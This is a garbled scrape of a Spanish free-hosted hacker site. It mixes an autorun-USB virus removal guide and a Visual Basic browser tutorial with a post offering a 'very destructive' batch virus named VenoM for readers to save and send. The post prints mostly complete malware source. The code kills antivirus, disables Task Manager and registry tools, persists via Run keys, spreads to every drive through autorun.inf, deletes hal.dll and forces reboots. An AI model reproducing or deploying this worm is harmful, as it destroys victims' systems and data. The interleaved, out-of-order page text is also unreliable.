1. Se replica a través de unidades de almacenamiento USB usando el archivo Autorun.inf. La estructura típica de un archivo autorun.inf es: [Autorun] En la sección Open se pone la ruta del archivo que se desea ejecutar, en el caso de este virus: ntdeiect.com 2. Entonces cuando se inserta una memoria USB y das en abrir la memoria para ver los Una vez ejecutados los archivos mencionados, el virus crea una copia de sí mismo con los C:WINDOWSSystem32amvo.exe Recalco que estos archivos también se crean con permisos de archivos de sistema y ocultos. 3. Luego, el virus procede a escribir en el registro un valor para asegurarse que cada vez que [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] 4. Luego el virus empieza a infectar todas las unidades físicas del computador, creando en el 5. El virus también se asegura que el usuario no pueda ver los archivos ocultos del sistema [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanc Una vez que conocemos el comportamiento de este virus, podemos proceder a su 1. Finalizar los procesos activos del virus, osea los ejecutables: amvo.exe y avpo.exe desde taskkill /f /im amvo.exe 2. Quitar los atributos de sistema, de oculto y de sólo lectura a los archivos mencionados, attrib -s -h -r C:autorun.inf 3. Proceder a la eliminación de estos archivos usando el comando delete con la opción /f del C:autorun.inf /f /q /a attrib -s -h -r c:windowssystem32amvo.exe 5. Una vez quitados los atributos procedemos a eliminar los archivos del virus de la carpeta del /f c:windowssystem32amvo.exe 6. Ahora borramos del registro los valores creados por el virus para evitar su ejecución reg delete HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v 7. Y restauramos la opción de poder ver los archivos ocultos y de sistema, desde la línea de reg add 8. Repetir los pasos 1-7 en todas las unidades. 9. Reiniciar el computador. Como verás el proceso de la eliminación de este virus es posible de forma manual pero como Seguro que mas de alguna vez habeis sentido curiosidad sobre como crear un navegador web bueno yo voi a explikar como crear vuestro propio navegador en Visual basic Resumen Este articulo te mostrara como crear un navegador web con mucha facilidad. Te servira para navegar en la web a tu estilo o tambien con mayor velocidad. Necesitas > Windows XP o Windows Vista > Microsoft Visual Basic version 2005 o 2008 - (Descarga: www.microsoft.com/express) Pasos > Primero Instala Microsoft Visual Basic (cualquier version). > Abre el programa y espera a que se configure. > Cuando ese proceso haya terminado te aparecera el programa como tal. > Despues haz click en "Crear Nuevo Projecto", en la parte superior del programa. > Selecciona "Windows Forms Application" en las opciones de projecto y nombralo en la parte de abajo. > Luego de hacer eso, va a aparecer el formulario parecido a una ventana de Windows. > Ve a la parte izquierda donde se encuentran los controles. > Navega en la lista de controles has encontrar "[WebBrowser]". > Arrastra "[WebBrowser]" hacia el formulario y dale forma. > Despues ve otra vez hacia los controles y selecciona "[TextBox]". > Arratra el "[TextBox]" hacia el formulario y dale forma. > Despues ve una vez mas hacia los controles y selecciona "Button". > Arrastra el "Button" hacia el formulario y dale forma. >> Despues de completar esos pasos, hay que hacer unas 4 cosas mas y estara listo > Debes hacer doble click en el "Button" y despues aparecera el codigo de el "Button". > Sin Clickear en ningun lado, copia el siguiente codigo y pegalo el codigo del "Button" (Private Sub Button_Click) Codigo: On Error Resume Next [WebBrowser1].Navigate ([TextBox1].Text) > Despues de hacer eso, presiona la tecla F5, escribe la direccion de la pagina web que quieras el "[TextBox]" y has click en el "Button" > Despues el navegador te llevara a la pagina web que escribiste en el "[TextBox]" >>> Despues de hacer esos pasos, ya tendras tu propio Navegador Web hecho. Importante Usando Microsoft Visual Basic puedes hacer todo tipo de Applicaciones, esta es solo una de las mas utilizadas. > Si puedes agregar dos "Button" mas, puedes hacer controles de "Atras" y "Adelante" con el siguiente Codido: >> El el segundo "Button" que agreges: On Error Resume Next [WebBrowser1].[GoBack] >> En el tercer "Button" que agreges: On Error Resume Next [WebBrowser1].[GoForward] IMPORTANTE: cuando hayas terminado de editarlo a tu manera, ve a la parte de arriba del programa y haz click en "Build" y selecciona "Build (el nombre del projecto)" y despues de eso, el programa creara tu aplicacion, y ya estara terminada. Despues buscala en tu PC y abrela, y alli tendras tu web-browser listo para usar. :::::::::::::::::::::::::::::::::::::::MegaHaker::::::::::::::::::::::::::::::::::::::::::::::::::20:11:26 Virus muy destructivo en batch y autoejecutable copy /y %u% %t%.exe para guardar y enviar el virus lo teneis que guardar en formato .bat (puede que tu antivirus te lo detecte)
megahaker - Home
Eliminar Virus AutoRun
ELIMINAR VIRUS AUTORUN:
COMPORTAMIENTO DEL VIRUS AUTORUN
Para los que no saben qué es el archivo autorun.inf: autorun es la habilidad de varios
sistemas operativos para que se lleve a cabo una acción al insertar un medio removible como
un CD, DVD o memorias USB.En el caso de las familia de S.O. de Microsoft si se desea
realizar una acción automática al insertar un CD, DVD o memoria USB se debe crear un
archivo autorun.inf en el directorio principal del disco o dispositivo de memoria USB.
Open=Nombre.extension
Label=Etiqueta_Unidad
icon=nombreicono.ico
en la sección Open llama a los siguientes archivos:
n1detect.com
n?deiect.com
nide?ect.com
uxde?ect.com
archivos, este archivo Autorun.inf ejecuta los archivos mencionados. Debo resaltar que estos
archivos están ocultos y con atributos de sistema y de sólo lectura, con esto evitan que se
muestren a simple vista.
siguientes nombres de archivo:
C:WINDOWSSystem32avpo.exe
C:WINDOWSSystem32amvo0.dll
C:WINDOWSSystem32amvo1.dll
C:WINDOWSSystem32avpo0.dll
C:WINDOWSSystem32avpo1.dll
inicie Windows se cargue automáticamente el virus junto al Sistema Operativo. Esto lo logra
escribiendo en el Registro del sistema lo siguiente:
“amva”=amvo.exe
o
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
“avpa”=avpo.exe
directorio raíz de cada unidad el archivo autorun.inf y n1detect.com y nombres similares a
los mostrados arriba. De este modo cuando el usuario haga doble click en MiPC y luego
abra sus unidades ya sean C, D, E, etc. Estarán repitiendo el proceso de infección. Osea
estarán repitiendo el paso 1.
de ningún modo. Esto lo logra escribiendo en el registro lo siguiente:
ed]
“Hidden”=dword:00000002
eliminación de forma manual si se desea.
Esto es lo que se debe hacer en la Unidad C:
la línea de comandos:
taskkill /f /im avpo.exe
esto se logra usando los siguientes comandos desde la consola:
attrib -s -h -r C:ntdeiect.com
attrib -s -h -r C:n1detect.com
attrib -s -h -r C:n?deiect.com
attrib -s -h -r C:nideiect.com
attrib -s -h -r C:nide?ect.com
attrib -s -h -r C:uxde?ect.com
para forzar el borrado, la opción /q para borrar sin pedir confirmación y la opción /a para
indicar que son archivos con atributos los que se van a eliminar, desde la línea de comandos:
del C:ntdeiect.com /f /q /a
del C:n1detect.com /f /q /a
del C:n1deiect.com /f /q /a
del C:nide?ect.com /f /q /a
del C:uxde?ect.com /f /q /a
4. Ahora quitamos los permisos de solo lectura, oculto y sistema a los archivos que quedaron
en la carpeta C:windowssystem32:
attrib -s -h -r c:windowssystem32avpo.exe
attrib -s -h -r c:windowssystem32amvo0.dll
attrib -s -h -r c:windowssystem32amvo1.dll
attrib -s -h -r c:windowssystem32avpo0.dll
attrib -s -h -r c:windowssystem32avpo1.dll
C:windowssystem32:
del /f c:windowssystem32avpo.exe
del /f c:windowssystem32amvo0.dll
del /f c:windowssystem32amvo1.dll
del /f c:windowssystem32avpo0.dll
del /f c:windowssystem32avpo1.dll
automática al inicio del sistema, desde la línea de comandos:
amva /f
reg delete HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v
avpo /f
comandos:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanc
ed /v Hidden /t REG_DWORD /d 1 /f
habrás notado también es un poco tedioso y más aún si no estás familiarizado con la Línea
de comandos a.k.a. CMD.EXE.
@echo off
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata%desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
copy /y %0 "%Windir%Systemwinlogon.exe"
if exist "%Windir%Systemwinlogon.exe" goto cop
copy /y %0 "%appdata%smss.exe"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d "%appdata%smss.exe" /f
:cop
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v CFTMON.EXE /t REG_SZ /d "%Windir%Systemwinlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d "1" /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t REG_DWORD /d "2" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t REG_DWORD /d "1" /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU_VenoM_Software_%a%%a%%a%Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%Men£ InicioProgramasInicioMS-DOS.pif"
copy /y %0 "%systemdrive%Docume~1Default UserMen£ InicioProgramasInicioSystem.exe"
copy /y %0 "%userprofile%SendToMis documetos.exe"
copy /y %0 "%userprofile%SendToDisco extraible.pif"
copy /y %0 "%userprofile%SendToDocumentos compartidos.scr"
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
attrib +h %windir%
copy /y %0 "%systemdrive%WINDOWS.EXE"
copy /y %0 "%windir%system32%username% 3D.scr"
copy /y %0 "%userprofile%Men£ InicioMis documentos.exe"
copy /y %0 "%userprofile%Datosd~1MicrosoftInternet ExplorerQuick LaunchMis documentos.exe"
copy /y %0 "%systemdrive%RECYCLERDocumendos borrados de %username%.exe"
copy /y %0 "%systemdrive%RECYCLERPapelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666Explorer.exe>>autorun.inf
echo shellOpen=>>autorun.inf
echo shellOpenCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellExplore=>>autorun.inf
echo shellExploreCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellfind=>>autorun.inf
echo shellfindCommand=.VenoM.666Explorer.exe>>autorun.inf
echo shellCMD=Sïmbolo del sistema>>autorun.inf
echo shellCMDCommand=.VenoM.666Explorer.exe>>autorun.inf
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0© /y %0 "%%h:100%% %username%.exe"&attrib -r -a -s -h %%h:*.inf>Nul© /y autorun.inf %%h:autorun.inf>Nul&attrib +s +h +r +a %%h:autorun.inf>Nul&md %%h:VenoM.666>Nul© /y %0 %%h:VenoM.666Explorer.exe>Nul&attrib +s +h %%h:VenoM.666*.exe>Nul&attrib +s +h %%h:VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3 @hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛÛ
echo ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛ Û ÛÛÛ Û ÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ>>VenoM.txt
copy /y VenoM.txt "%userprofile%SendToGame Over %a%%a%.txt"
print VenoM.txt
for /l %%t in (1,1,24) do at %%t /delete
set h=0
:q
at %h%:13 /interactive "%userprofile%VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q
:l
if exist "%appdata%services.exe" goto bl
copy /y %0 "%appdata%services.exe"
:bl
if exist "%appdata%lsass.exe" goto oz
copy /y %0 "%appdata%lsass.exe"
:oz
if %0=="%appdata%services.exe" goto ser
if %0=="%appdata%lsass.exe" goto w
"%appdata%services.exe"
"%appdata%lsass.exe"
exit
:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:VenoM.666Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:*.* (if not exist "%%h:autorun.inf" goto d )
goto w
:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:*.* attrib -h -s %0© /y %0 "%%h:100%% %username%.exe"&attrib -r -a -s -h %%h:*.inf© /y autorun.inf %%h:autorun.inf&attrib +s +h +r +a %%h:autorun.inf&md %%h:VenoM.666© /y %0 %%h:VenoM.666Explorer.exe&attrib +s +h %%h:VenoM.666*.exe&attrib +s +h %%h:VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%desktop.inf"
goto w
r
if %COMPUTERNAME%==DESKTOP exit
del /f /q "%windir%system32hal.dll"
cd "%userprofile%Men£ InicioProgramasInicio"
echo shutdown -r -f -t 00>VenoM.bat
echo OPTION EXPLICIT>VenoM.vbs
echo DIM clave>>VenoM.vbs
echo DO WHILE (clave ^<^> "666">>VenoM.vbs
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
echo LOOP>>VenoM.vbs
start VenoM.vbs
shutdown -r -f -t 120 -c "Welcome to Hell"
:B
echo
goto B
:ser
cd "%appdata%"
set u=%0
dir "%userprofile%misdoc~1*." /b /s >"%appdata%NTUSER.DAT.DLL"
for %%f in (%TU%) do if exist %%f:*.* (dir "%%f:*." /b /s) >>"%appdata%NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
:V
set t=%1
Hoy habia 35 visitantes (37 clics a subpáginas) ¡Aqui en esta página!
Get your own Poll!
;
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?